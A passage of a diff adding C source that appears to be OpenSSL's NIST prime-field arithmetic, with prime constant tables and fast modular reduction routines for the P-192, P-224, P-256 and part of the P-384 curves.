+    {0xFFFFFFFD, 0xFFFFFFFF, 0xFFFFFFFF, 0x00000002,
+     0x00000000, 0x00000000, 0x00000003, 0xFFFFFFFD},
+    {0xFFFFFFFC, 0xFFFFFFFF, 0xFFFFFFFF, 0x00000003,
+     0x00000000, 0x00000000, 0x00000004, 0xFFFFFFFC},
+    {0xFFFFFFFB, 0xFFFFFFFF, 0xFFFFFFFF, 0x00000004,
+     0x00000000, 0x00000000, 0x00000005, 0xFFFFFFFB},
+};
+
+static const BN_ULONG _nist_p_256_sqr[] = {
+    0x00000001, 0x00000000, 0x00000000, 0xFFFFFFFE,
+    0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFE, 0x00000001,
+    0xFFFFFFFE, 0x00000001, 0xFFFFFFFE, 0x00000001,
+    0x00000001, 0xFFFFFFFE, 0x00000002, 0xFFFFFFFE
+};
+
+static const BN_ULONG _nist_p_384[][BN_NIST_384_TOP] = {
+    {0xFFFFFFFF, 0x00000000, 0x00000000, 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFF,
+     0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF},
+    {0xFFFFFFFE, 0x00000001, 0x00000000, 0xFFFFFFFE, 0xFFFFFFFD, 0xFFFFFFFF,
+     0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF},
+    {0xFFFFFFFD, 0x00000002, 0x00000000, 0xFFFFFFFD, 0xFFFFFFFC, 0xFFFFFFFF,
+     0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF},
+    {0xFFFFFFFC, 0x00000003, 0x00000000, 0xFFFFFFFC, 0xFFFFFFFB, 0xFFFFFFFF,
+     0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF},
+    {0xFFFFFFFB, 0x00000004, 0x00000000, 0xFFFFFFFB, 0xFFFFFFFA, 0xFFFFFFFF,
+     0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF},
+};
+
+static const BN_ULONG _nist_p_384_sqr[] = {
+    0x00000001, 0xFFFFFFFE, 0x00000000, 0x00000002, 0x00000000, 0xFFFFFFFE,
+    0x00000000, 0x00000002, 0x00000001, 0x00000000, 0x00000000, 0x00000000,
+    0xFFFFFFFE, 0x00000001, 0x00000000, 0xFFFFFFFE, 0xFFFFFFFD, 0xFFFFFFFF,
+    0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF
+};
+
+static const BN_ULONG _nist_p_521[] = { 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF,
+    0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF,
+    0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF,
+    0xFFFFFFFF, 0x000001FF
+};
+
+static const BN_ULONG _nist_p_521_sqr[] = {
+    0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
+    0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
+    0x00000000, 0x00000000, 0x00000000, 0x00000000, 0xFFFFFC00, 0xFFFFFFFF,
+    0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF,
+    0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF,
+    0xFFFFFFFF, 0xFFFFFFFF, 0x0003FFFF
+};
+#else
+# error "unsupported BN_BITS2"
+#endif
+
+static const BIGNUM _bignum_nist_p_192 = {
+    (BN_ULONG *)_nist_p_192[0],
+    BN_NIST_192_TOP,
+    BN_NIST_192_TOP,
+    0,
+    BN_FLG_STATIC_DATA
+};
+
+static const BIGNUM _bignum_nist_p_224 = {
+    (BN_ULONG *)_nist_p_224[0],
+    BN_NIST_224_TOP,
+    BN_NIST_224_TOP,
+    0,
+    BN_FLG_STATIC_DATA
+};
+
+static const BIGNUM _bignum_nist_p_256 = {
+    (BN_ULONG *)_nist_p_256[0],
+    BN_NIST_256_TOP,
+    BN_NIST_256_TOP,
+    0,
+    BN_FLG_STATIC_DATA
+};
+
+static const BIGNUM _bignum_nist_p_384 = {
+    (BN_ULONG *)_nist_p_384[0],
+    BN_NIST_384_TOP,
+    BN_NIST_384_TOP,
+    0,
+    BN_FLG_STATIC_DATA
+};
+
+static const BIGNUM _bignum_nist_p_521 = {
+    (BN_ULONG *)_nist_p_521,
+    BN_NIST_521_TOP,
+    BN_NIST_521_TOP,
+    0,
+    BN_FLG_STATIC_DATA
+};
+
+const BIGNUM *BN_get0_nist_prime_192(void)
+{
+    return &_bignum_nist_p_192;
+}
+
+const BIGNUM *BN_get0_nist_prime_224(void)
+{
+    return &_bignum_nist_p_224;
+}
+
+const BIGNUM *BN_get0_nist_prime_256(void)
+{
+    return &_bignum_nist_p_256;
+}
+
+const BIGNUM *BN_get0_nist_prime_384(void)
+{
+    return &_bignum_nist_p_384;
+}
+
+const BIGNUM *BN_get0_nist_prime_521(void)
+{
+    return &_bignum_nist_p_521;
+}
+
+static void nist_cp_bn_0(BN_ULONG *dst, const BN_ULONG *src, int top, int max)
+{
+    int i;
+
+#ifdef BN_DEBUG
+    OPENSSL_assert(top <= max);
+#endif
+    for (i = 0; i < top; i++)
+        dst[i] = src[i];
+    for (; i < max; i++)
+        dst[i] = 0;
+}
+
+static void nist_cp_bn(BN_ULONG *dst, const BN_ULONG *src, int top)
+{
+    int i;
+
+    for (i = 0; i < top; i++)
+        dst[i] = src[i];
+}
+
+#if BN_BITS2 == 64
+# define bn_cp_64(to, n, from, m)        (to)[n] = (m>=0)?((from)[m]):0;
+# define bn_64_set_0(to, n)              (to)[n] = (BN_ULONG)0;
+/*
+ * two following macros are implemented under assumption that they
+ * are called in a sequence with *ascending* n, i.e. as they are...
+ */
+# define bn_cp_32_naked(to, n, from, m)  (((n)&1)?(to[(n)/2]|=((m)&1)?(from[(m)/2]&BN_MASK2h):(from[(m)/2]<<32))\
+                                                :(to[(n)/2] =((m)&1)?(from[(m)/2]>>32):(from[(m)/2]&BN_MASK2l)))
+# define bn_32_set_0(to, n)              (((n)&1)?(to[(n)/2]&=BN_MASK2l):(to[(n)/2]=0));
+# define bn_cp_32(to,n,from,m)           ((m)>=0)?bn_cp_32_naked(to,n,from,m):bn_32_set_0(to,n)
+# if defined(L_ENDIAN)
+#  if defined(__arch64__)
+#   define NIST_INT64 long
+#  else
+#   define NIST_INT64 long long
+#  endif
+# endif
+#else
+# define bn_cp_64(to, n, from, m) \
+        { \
+        bn_cp_32(to, (n)*2, from, (m)*2); \
+        bn_cp_32(to, (n)*2+1, from, (m)*2+1); \
+        }
+# define bn_64_set_0(to, n) \
+        { \
+        bn_32_set_0(to, (n)*2); \
+        bn_32_set_0(to, (n)*2+1); \
+        }
+# define bn_cp_32(to, n, from, m)        (to)[n] = (m>=0)?((from)[m]):0;
+# define bn_32_set_0(to, n)              (to)[n] = (BN_ULONG)0;
+# if defined(_WIN32) && !defined(__GNUC__)
+#  define NIST_INT64 __int64
+# elif defined(BN_LLONG)
+#  define NIST_INT64 long long
+# endif
+#endif                          /* BN_BITS2 != 64 */
+
+#define nist_set_192(to, from, a1, a2, a3) \
+        { \
+        bn_cp_64(to, 0, from, (a3) - 3) \
+        bn_cp_64(to, 1, from, (a2) - 3) \
+        bn_cp_64(to, 2, from, (a1) - 3) \
+        }
+
+int BN_nist_mod_192(BIGNUM *r, const BIGNUM *a, const BIGNUM *field,
+                    BN_CTX *ctx)
+{
+    int top = a->top, i;
+    int carry;
+    register BN_ULONG *r_d, *a_d = a->d;
+    union {
+        BN_ULONG bn[BN_NIST_192_TOP];
+        unsigned int ui[BN_NIST_192_TOP * sizeof(BN_ULONG) /
+                        sizeof(unsigned int)];
+    } buf;
+    BN_ULONG c_d[BN_NIST_192_TOP], *res;
+    PTR_SIZE_INT mask;
+    static const BIGNUM _bignum_nist_p_192_sqr = {
+        (BN_ULONG *)_nist_p_192_sqr,
+        sizeof(_nist_p_192_sqr) / sizeof(_nist_p_192_sqr[0]),
+        sizeof(_nist_p_192_sqr) / sizeof(_nist_p_192_sqr[0]),
+        0, BN_FLG_STATIC_DATA
+    };
+
+    field = &_bignum_nist_p_192; /* just to make sure */
+
+    if (BN_is_negative(a) || BN_ucmp(a, &_bignum_nist_p_192_sqr) >= 0)
+        return BN_nnmod(r, a, field, ctx);
+
+    i = BN_ucmp(field, a);
+    if (i == 0) {
+        BN_zero(r);
+        return 1;
+    } else if (i > 0)
+        return (r == a) ? 1 : (BN_copy(r, a) != NULL);
+
+    if (r != a) {
+        if (!bn_wexpand(r, BN_NIST_192_TOP))
+            return 0;
+        r_d = r->d;
+        nist_cp_bn(r_d, a_d, BN_NIST_192_TOP);
+    } else
+        r_d = a_d;
+
+    nist_cp_bn_0(buf.bn, a_d + BN_NIST_192_TOP, top - BN_NIST_192_TOP,
+                 BN_NIST_192_TOP);
+
+#if defined(NIST_INT64)
+    {
+        NIST_INT64 acc;         /* accumulator */
+        unsigned int *rp = (unsigned int *)r_d;
+        const unsigned int *bp = (const unsigned int *)buf.ui;
+
+        acc = rp[0];
+        acc += bp[3 * 2 - 6];
+        acc += bp[5 * 2 - 6];
+        rp[0] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[1];
+        acc += bp[3 * 2 - 5];
+        acc += bp[5 * 2 - 5];
+        rp[1] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[2];
+        acc += bp[3 * 2 - 6];
+        acc += bp[4 * 2 - 6];
+        acc += bp[5 * 2 - 6];
+        rp[2] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[3];
+        acc += bp[3 * 2 - 5];
+        acc += bp[4 * 2 - 5];
+        acc += bp[5 * 2 - 5];
+        rp[3] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[4];
+        acc += bp[4 * 2 - 6];
+        acc += bp[5 * 2 - 6];
+        rp[4] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[5];
+        acc += bp[4 * 2 - 5];
+        acc += bp[5 * 2 - 5];
+        rp[5] = (unsigned int)acc;
+
+        carry = (int)(acc >> 32);
+    }
+#else
+    {
+        BN_ULONG t_d[BN_NIST_192_TOP];
+
+        nist_set_192(t_d, buf.bn, 0, 3, 3);
+        carry = (int)bn_add_words(r_d, r_d, t_d, BN_NIST_192_TOP);
+        nist_set_192(t_d, buf.bn, 4, 4, 0);
+        carry += (int)bn_add_words(r_d, r_d, t_d, BN_NIST_192_TOP);
+        nist_set_192(t_d, buf.bn, 5, 5, 5)
+            carry += (int)bn_add_words(r_d, r_d, t_d, BN_NIST_192_TOP);
+    }
+#endif
+    if (carry > 0)
+        carry =
+            (int)bn_sub_words(r_d, r_d, _nist_p_192[carry - 1],
+                              BN_NIST_192_TOP);
+    else
+        carry = 1;
+
+    /*
+     * we need 'if (carry==0 || result>=modulus) result-=modulus;'
+     * as comparison implies subtraction, we can write
+     * 'tmp=result-modulus; if (!carry || !borrow) result=tmp;'
+     * this is what happens below, but without explicit if:-) a.
+     */
+    mask =
+        0 - (PTR_SIZE_INT) bn_sub_words(c_d, r_d, _nist_p_192[0],
+                                        BN_NIST_192_TOP);
+    mask &= 0 - (PTR_SIZE_INT) carry;
+    res = c_d;
+    res = (BN_ULONG *)
+        (((PTR_SIZE_INT) res & ~mask) | ((PTR_SIZE_INT) r_d & mask));
+    nist_cp_bn(r_d, res, BN_NIST_192_TOP);
+    r->top = BN_NIST_192_TOP;
+    bn_correct_top(r);
+
+    return 1;
+}
+
+typedef BN_ULONG (*bn_addsub_f) (BN_ULONG *, const BN_ULONG *,
+                                 const BN_ULONG *, int);
+
+#define nist_set_224(to, from, a1, a2, a3, a4, a5, a6, a7) \
+        { \
+        bn_cp_32(to, 0, from, (a7) - 7) \
+        bn_cp_32(to, 1, from, (a6) - 7) \
+        bn_cp_32(to, 2, from, (a5) - 7) \
+        bn_cp_32(to, 3, from, (a4) - 7) \
+        bn_cp_32(to, 4, from, (a3) - 7) \
+        bn_cp_32(to, 5, from, (a2) - 7) \
+        bn_cp_32(to, 6, from, (a1) - 7) \
+        }
+
+int BN_nist_mod_224(BIGNUM *r, const BIGNUM *a, const BIGNUM *field,
+                    BN_CTX *ctx)
+{
+    int top = a->top, i;
+    int carry;
+    BN_ULONG *r_d, *a_d = a->d;
+    union {
+        BN_ULONG bn[BN_NIST_224_TOP];
+        unsigned int ui[BN_NIST_224_TOP * sizeof(BN_ULONG) /
+                        sizeof(unsigned int)];
+    } buf;
+    BN_ULONG c_d[BN_NIST_224_TOP], *res;
+    PTR_SIZE_INT mask;
+    union {
+        bn_addsub_f f;
+        PTR_SIZE_INT p;
+    } u;
+    static const BIGNUM _bignum_nist_p_224_sqr = {
+        (BN_ULONG *)_nist_p_224_sqr,
+        sizeof(_nist_p_224_sqr) / sizeof(_nist_p_224_sqr[0]),
+        sizeof(_nist_p_224_sqr) / sizeof(_nist_p_224_sqr[0]),
+        0, BN_FLG_STATIC_DATA
+    };
+
+    field = &_bignum_nist_p_224; /* just to make sure */
+
+    if (BN_is_negative(a) || BN_ucmp(a, &_bignum_nist_p_224_sqr) >= 0)
+        return BN_nnmod(r, a, field, ctx);
+
+    i = BN_ucmp(field, a);
+    if (i == 0) {
+        BN_zero(r);
+        return 1;
+    } else if (i > 0)
+        return (r == a) ? 1 : (BN_copy(r, a) != NULL);
+
+    if (r != a) {
+        if (!bn_wexpand(r, BN_NIST_224_TOP))
+            return 0;
+        r_d = r->d;
+        nist_cp_bn(r_d, a_d, BN_NIST_224_TOP);
+    } else
+        r_d = a_d;
+
+#if BN_BITS2==64
+    /* copy upper 256 bits of 448 bit number ... */
+    nist_cp_bn_0(c_d, a_d + (BN_NIST_224_TOP - 1),
+                 top - (BN_NIST_224_TOP - 1), BN_NIST_224_TOP);
+    /* ... and right shift by 32 to obtain upper 224 bits */
+    nist_set_224(buf.bn, c_d, 14, 13, 12, 11, 10, 9, 8);
+    /* truncate lower part to 224 bits too */
+    r_d[BN_NIST_224_TOP - 1] &= BN_MASK2l;
+#else
+    nist_cp_bn_0(buf.bn, a_d + BN_NIST_224_TOP, top - BN_NIST_224_TOP,
+                 BN_NIST_224_TOP);
+#endif
+
+#if defined(NIST_INT64) && BN_BITS2!=64
+    {
+        NIST_INT64 acc;         /* accumulator */
+        unsigned int *rp = (unsigned int *)r_d;
+        const unsigned int *bp = (const unsigned int *)buf.ui;
+
+        acc = rp[0];
+        acc -= bp[7 - 7];
+        acc -= bp[11 - 7];
+        rp[0] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[1];
+        acc -= bp[8 - 7];
+        acc -= bp[12 - 7];
+        rp[1] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[2];
+        acc -= bp[9 - 7];
+        acc -= bp[13 - 7];
+        rp[2] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[3];
+        acc += bp[7 - 7];
+        acc += bp[11 - 7];
+        acc -= bp[10 - 7];
+        rp[3] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[4];
+        acc += bp[8 - 7];
+        acc += bp[12 - 7];
+        acc -= bp[11 - 7];
+        rp[4] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[5];
+        acc += bp[9 - 7];
+        acc += bp[13 - 7];
+        acc -= bp[12 - 7];
+        rp[5] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[6];
+        acc += bp[10 - 7];
+        acc -= bp[13 - 7];
+        rp[6] = (unsigned int)acc;
+
+        carry = (int)(acc >> 32);
+# if BN_BITS2==64
+        rp[7] = carry;
+# endif
+    }
+#else
+    {
+        BN_ULONG t_d[BN_NIST_224_TOP];
+
+        nist_set_224(t_d, buf.bn, 10, 9, 8, 7, 0, 0, 0);
+        carry = (int)bn_add_words(r_d, r_d, t_d, BN_NIST_224_TOP);
+        nist_set_224(t_d, buf.bn, 0, 13, 12, 11, 0, 0, 0);
+        carry += (int)bn_add_words(r_d, r_d, t_d, BN_NIST_224_TOP);
+        nist_set_224(t_d, buf.bn, 13, 12, 11, 10, 9, 8, 7);
+        carry -= (int)bn_sub_words(r_d, r_d, t_d, BN_NIST_224_TOP);
+        nist_set_224(t_d, buf.bn, 0, 0, 0, 0, 13, 12, 11);
+        carry -= (int)bn_sub_words(r_d, r_d, t_d, BN_NIST_224_TOP);
+
+# if BN_BITS2==64
+        carry = (int)(r_d[BN_NIST_224_TOP - 1] >> 32);
+# endif
+    }
+#endif
+    u.f = bn_sub_words;
+    if (carry > 0) {
+        carry =
+            (int)bn_sub_words(r_d, r_d, _nist_p_224[carry - 1],
+                              BN_NIST_224_TOP);
+#if BN_BITS2==64
+        carry = (int)(~(r_d[BN_NIST_224_TOP - 1] >> 32)) & 1;
+#endif
+    } else if (carry < 0) {
+        /*
+         * it's a bit more comlicated logic in this case. if bn_add_words
+         * yields no carry, then result has to be adjusted by unconditionally
+         * *adding* the modulus. but if it does, then result has to be
+         * compared to the modulus and conditionally adjusted by
+         * *subtracting* the latter.
+         */
+        carry =
+            (int)bn_add_words(r_d, r_d, _nist_p_224[-carry - 1],
+                              BN_NIST_224_TOP);
+        mask = 0 - (PTR_SIZE_INT) carry;
+        u.p = ((PTR_SIZE_INT) bn_sub_words & mask) |
+            ((PTR_SIZE_INT) bn_add_words & ~mask);
+    } else
+        carry = 1;
+
+    /* otherwise it's effectively same as in BN_nist_mod_192... */
+    mask =
+        0 - (PTR_SIZE_INT) (*u.f) (c_d, r_d, _nist_p_224[0], BN_NIST_224_TOP);
+    mask &= 0 - (PTR_SIZE_INT) carry;
+    res = c_d;
+    res = (BN_ULONG *)(((PTR_SIZE_INT) res & ~mask) |
+                       ((PTR_SIZE_INT) r_d & mask));
+    nist_cp_bn(r_d, res, BN_NIST_224_TOP);
+    r->top = BN_NIST_224_TOP;
+    bn_correct_top(r);
+
+    return 1;
+}
+
+#define nist_set_256(to, from, a1, a2, a3, a4, a5, a6, a7, a8) \
+        { \
+        bn_cp_32(to, 0, from, (a8) - 8) \
+        bn_cp_32(to, 1, from, (a7) - 8) \
+        bn_cp_32(to, 2, from, (a6) - 8) \
+        bn_cp_32(to, 3, from, (a5) - 8) \
+        bn_cp_32(to, 4, from, (a4) - 8) \
+        bn_cp_32(to, 5, from, (a3) - 8) \
+        bn_cp_32(to, 6, from, (a2) - 8) \
+        bn_cp_32(to, 7, from, (a1) - 8) \
+        }
+
+int BN_nist_mod_256(BIGNUM *r, const BIGNUM *a, const BIGNUM *field,
+                    BN_CTX *ctx)
+{
+    int i, top = a->top;
+    int carry = 0;
+    register BN_ULONG *a_d = a->d, *r_d;
+    union {
+        BN_ULONG bn[BN_NIST_256_TOP];
+        unsigned int ui[BN_NIST_256_TOP * sizeof(BN_ULONG) /
+                        sizeof(unsigned int)];
+    } buf;
+    BN_ULONG c_d[BN_NIST_256_TOP], *res;
+    PTR_SIZE_INT mask;
+    union {
+        bn_addsub_f f;
+        PTR_SIZE_INT p;
+    } u;
+    static const BIGNUM _bignum_nist_p_256_sqr = {
+        (BN_ULONG *)_nist_p_256_sqr,
+        sizeof(_nist_p_256_sqr) / sizeof(_nist_p_256_sqr[0]),
+        sizeof(_nist_p_256_sqr) / sizeof(_nist_p_256_sqr[0]),
+        0, BN_FLG_STATIC_DATA
+    };
+
+    field = &_bignum_nist_p_256; /* just to make sure */
+
+    if (BN_is_negative(a) || BN_ucmp(a, &_bignum_nist_p_256_sqr) >= 0)
+        return BN_nnmod(r, a, field, ctx);
+
+    i = BN_ucmp(field, a);
+    if (i == 0) {
+        BN_zero(r);
+        return 1;
+    } else if (i > 0)
+        return (r == a) ? 1 : (BN_copy(r, a) != NULL);
+
+    if (r != a) {
+        if (!bn_wexpand(r, BN_NIST_256_TOP))
+            return 0;
+        r_d = r->d;
+        nist_cp_bn(r_d, a_d, BN_NIST_256_TOP);
+    } else
+        r_d = a_d;
+
+    nist_cp_bn_0(buf.bn, a_d + BN_NIST_256_TOP, top - BN_NIST_256_TOP,
+                 BN_NIST_256_TOP);
+
+#if defined(NIST_INT64)
+    {
+        NIST_INT64 acc;         /* accumulator */
+        unsigned int *rp = (unsigned int *)r_d;
+        const unsigned int *bp = (const unsigned int *)buf.ui;
+
+        acc = rp[0];
+        acc += bp[8 - 8];
+        acc += bp[9 - 8];
+        acc -= bp[11 - 8];
+        acc -= bp[12 - 8];
+        acc -= bp[13 - 8];
+        acc -= bp[14 - 8];
+        rp[0] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[1];
+        acc += bp[9 - 8];
+        acc += bp[10 - 8];
+        acc -= bp[12 - 8];
+        acc -= bp[13 - 8];
+        acc -= bp[14 - 8];
+        acc -= bp[15 - 8];
+        rp[1] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[2];
+        acc += bp[10 - 8];
+        acc += bp[11 - 8];
+        acc -= bp[13 - 8];
+        acc -= bp[14 - 8];
+        acc -= bp[15 - 8];
+        rp[2] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[3];
+        acc += bp[11 - 8];
+        acc += bp[11 - 8];
+        acc += bp[12 - 8];
+        acc += bp[12 - 8];
+        acc += bp[13 - 8];
+        acc -= bp[15 - 8];
+        acc -= bp[8 - 8];
+        acc -= bp[9 - 8];
+        rp[3] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[4];
+        acc += bp[12 - 8];
+        acc += bp[12 - 8];
+        acc += bp[13 - 8];
+        acc += bp[13 - 8];
+        acc += bp[14 - 8];
+        acc -= bp[9 - 8];
+        acc -= bp[10 - 8];
+        rp[4] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[5];
+        acc += bp[13 - 8];
+        acc += bp[13 - 8];
+        acc += bp[14 - 8];
+        acc += bp[14 - 8];
+        acc += bp[15 - 8];
+        acc -= bp[10 - 8];
+        acc -= bp[11 - 8];
+        rp[5] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[6];
+        acc += bp[14 - 8];
+        acc += bp[14 - 8];
+        acc += bp[15 - 8];
+        acc += bp[15 - 8];
+        acc += bp[14 - 8];
+        acc += bp[13 - 8];
+        acc -= bp[8 - 8];
+        acc -= bp[9 - 8];
+        rp[6] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[7];
+        acc += bp[15 - 8];
+        acc += bp[15 - 8];
+        acc += bp[15 - 8];
+        acc += bp[8 - 8];
+        acc -= bp[10 - 8];
+        acc -= bp[11 - 8];
+        acc -= bp[12 - 8];
+        acc -= bp[13 - 8];
+        rp[7] = (unsigned int)acc;
+
+        carry = (int)(acc >> 32);
+    }
+#else
+    {
+        BN_ULONG t_d[BN_NIST_256_TOP];
+
+        /*
+         * S1
+         */
+        nist_set_256(t_d, buf.bn, 15, 14, 13, 12, 11, 0, 0, 0);
+        /*
+         * S2
+         */
+        nist_set_256(c_d, buf.bn, 0, 15, 14, 13, 12, 0, 0, 0);
+        carry = (int)bn_add_words(t_d, t_d, c_d, BN_NIST_256_TOP);
+        /* left shift */
+        {
+            register BN_ULONG *ap, t, c;
+            ap = t_d;
+            c = 0;
+            for (i = BN_NIST_256_TOP; i != 0; --i) {
+                t = *ap;
+                *(ap++) = ((t << 1) | c) & BN_MASK2;
+                c = (t & BN_TBIT) ? 1 : 0;
+            }
+            carry <<= 1;
+            carry |= c;
+        }
+        carry += (int)bn_add_words(r_d, r_d, t_d, BN_NIST_256_TOP);
+        /*
+         * S3
+         */
+        nist_set_256(t_d, buf.bn, 15, 14, 0, 0, 0, 10, 9, 8);
+        carry += (int)bn_add_words(r_d, r_d, t_d, BN_NIST_256_TOP);
+        /*
+         * S4
+         */
+        nist_set_256(t_d, buf.bn, 8, 13, 15, 14, 13, 11, 10, 9);
+        carry += (int)bn_add_words(r_d, r_d, t_d, BN_NIST_256_TOP);
+        /*
+         * D1
+         */
+        nist_set_256(t_d, buf.bn, 10, 8, 0, 0, 0, 13, 12, 11);
+        carry -= (int)bn_sub_words(r_d, r_d, t_d, BN_NIST_256_TOP);
+        /*
+         * D2
+         */
+        nist_set_256(t_d, buf.bn, 11, 9, 0, 0, 15, 14, 13, 12);
+        carry -= (int)bn_sub_words(r_d, r_d, t_d, BN_NIST_256_TOP);
+        /*
+         * D3
+         */
+        nist_set_256(t_d, buf.bn, 12, 0, 10, 9, 8, 15, 14, 13);
+        carry -= (int)bn_sub_words(r_d, r_d, t_d, BN_NIST_256_TOP);
+        /*
+         * D4
+         */
+        nist_set_256(t_d, buf.bn, 13, 0, 11, 10, 9, 0, 15, 14);
+        carry -= (int)bn_sub_words(r_d, r_d, t_d, BN_NIST_256_TOP);
+
+    }
+#endif
+    /* see BN_nist_mod_224 for explanation */
+    u.f = bn_sub_words;
+    if (carry > 0)
+        carry =
+            (int)bn_sub_words(r_d, r_d, _nist_p_256[carry - 1],
+                              BN_NIST_256_TOP);
+    else if (carry < 0) {
+        carry =
+            (int)bn_add_words(r_d, r_d, _nist_p_256[-carry - 1],
+                              BN_NIST_256_TOP);
+        mask = 0 - (PTR_SIZE_INT) carry;
+        u.p = ((PTR_SIZE_INT) bn_sub_words & mask) |
+            ((PTR_SIZE_INT) bn_add_words & ~mask);
+    } else
+        carry = 1;
+
+    mask =
+        0 - (PTR_SIZE_INT) (*u.f) (c_d, r_d, _nist_p_256[0], BN_NIST_256_TOP);
+    mask &= 0 - (PTR_SIZE_INT) carry;
+    res = c_d;
+    res = (BN_ULONG *)(((PTR_SIZE_INT) res & ~mask) |
+                       ((PTR_SIZE_INT) r_d & mask));
+    nist_cp_bn(r_d, res, BN_NIST_256_TOP);
+    r->top = BN_NIST_256_TOP;
+    bn_correct_top(r);
+
+    return 1;
+}
+
+#define nist_set_384(to,from,a1,a2,a3,a4,a5,a6,a7,a8,a9,a10,a11,a12) \
+        { \
+        bn_cp_32(to, 0, from,  (a12) - 12) \
+        bn_cp_32(to, 1, from,  (a11) - 12) \
+        bn_cp_32(to, 2, from,  (a10) - 12) \
+        bn_cp_32(to, 3, from,  (a9) - 12)  \
+        bn_cp_32(to, 4, from,  (a8) - 12)  \
+        bn_cp_32(to, 5, from,  (a7) - 12)  \
+        bn_cp_32(to, 6, from,  (a6) - 12)  \
+        bn_cp_32(to, 7, from,  (a5) - 12)  \
+        bn_cp_32(to, 8, from,  (a4) - 12)  \
+        bn_cp_32(to, 9, from,  (a3) - 12)  \
+        bn_cp_32(to, 10, from, (a2) - 12)  \
+        bn_cp_32(to, 11, from, (a1) - 12)  \
+        }
+
+int BN_nist_mod_384(BIGNUM *r, const BIGNUM *a, const BIGNUM *field,
+                    BN_CTX *ctx)
+{
+    int i, top = a->top;
+    int carry = 0;
+    register BN_ULONG *r_d, *a_d = a->d;
+    union {
+        BN_ULONG bn[BN_NIST_384_TOP];
+        unsigned int ui[BN_NIST_384_TOP * sizeof(BN_ULONG) /
+                        sizeof(unsigned int)];
+    } buf;
+    BN_ULONG c_d[BN_NIST_384_TOP], *res;
+    PTR_SIZE_INT mask;
+    union {
+        bn_addsub_f f;
+        PTR_SIZE_INT p;
+    } u;
+    static const BIGNUM _bignum_nist_p_384_sqr = {
+        (BN_ULONG *)_nist_p_384_sqr,
+        sizeof(_nist_p_384_sqr) / sizeof(_nist_p_384_sqr[0]),
+        sizeof(_nist_p_384_sqr) / sizeof(_nist_p_384_sqr[0]),
+        0, BN_FLG_STATIC_DATA
+    };
+
+    field = &_bignum_nist_p_384; /* just to make sure */
+
+    if (BN_is_negative(a) || BN_ucmp(a, &_bignum_nist_p_384_sqr) >= 0)
+        return BN_nnmod(r, a, field, ctx);
+
+    i = BN_ucmp(field, a);
+    if (i == 0) {
+        BN_zero(r);
+        return 1;
+    } else if (i > 0)
+        return (r == a) ? 1 : (BN_copy(r, a) != NULL);
+
+    if (r != a) {
+        if (!bn_wexpand(r, BN_NIST_384_TOP))
+            return 0;
+        r_d = r->d;
+        nist_cp_bn(r_d, a_d, BN_NIST_384_TOP);
+    } else
+        r_d = a_d;
+
+    nist_cp_bn_0(buf.bn, a_d + BN_NIST_384_TOP, top - BN_NIST_384_TOP,
+                 BN_NIST_384_TOP);
+
+#if defined(NIST_INT64)
+    {
+        NIST_INT64 acc;         /* accumulator */
+        unsigned int *rp = (unsigned int *)r_d;
+        const unsigned int *bp = (const unsigned int *)buf.ui;
+
+        acc = rp[0];
+        acc += bp[12 - 12];
+        acc += bp[21 - 12];
+        acc += bp[20 - 12];
+        acc -= bp[23 - 12];
+        rp[0] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[1];
+        acc += bp[13 - 12];
+        acc += bp[22 - 12];
+        acc += bp[23 - 12];
+        acc -= bp[12 - 12];
+        acc -= bp[20 - 12];
+        rp[1] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[2];
+        acc += bp[14 - 12];
+        acc += bp[23 - 12];
+        acc -= bp[13 - 12];
+        acc -= bp[21 - 12];
+        rp[2] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[3];
+        acc += bp[15 - 12];
+        acc += bp[12 - 12];
+        acc += bp[20 - 12];
+        acc += bp[21 - 12];
+        acc -= bp[14 - 12];
